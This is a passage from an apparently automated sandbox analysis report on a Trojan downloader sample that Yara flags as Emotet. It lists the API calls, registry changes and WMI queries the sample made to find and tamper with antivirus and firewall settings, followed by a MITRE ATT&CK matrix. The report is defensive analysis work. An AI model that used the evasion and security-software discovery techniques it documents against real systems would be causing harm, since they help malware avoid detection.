          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00418091 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0041A9AA __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0041E999 GetVersionExA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          Changes security center settings (notifications, updates, antivirus, firewall)
          Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
          Source: svchost.exe, 0000000B.00000002.488029249.0000020F6E102000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: svchost.exe, 0000000B.00000002.487982115.0000020F6E03D000.00000004.00000001.sdmp | Binary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

          Stealing of Sensitive Information:

          Yara detected Emotet
          Source: Yara match | File source: 00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.226321958.0000000002270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.226329464.0000000002281000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.488556425.0000000000711000.00000020.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          The matrix is listed here per tactic column (rows of the matrix carry no meaning). A trailing number is the report's badge for the signatures matched on that technique; techniques without one are unmatched matrix entries.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Windows Management Instrumentation 1; Native API 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection 2; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: Masquerading 121; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 3; Process Injection 2; Deobfuscate/Decode Files or Information 1; Hidden Files and Directories 1; Obfuscated Files or Information 2; File Deletion 1
          Credential Access: Input Capture 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: System Time Discovery 2; Security Software Discovery 41; Virtualization/Sandbox Evasion 3; Process Discovery 2; Application Window Discovery 1; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 37
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: Input Capture 1; Archive Collected Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel 1; Non-Standard Port 1; Non-Application Layer Protocol 1; Application Layer Protocol 11; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java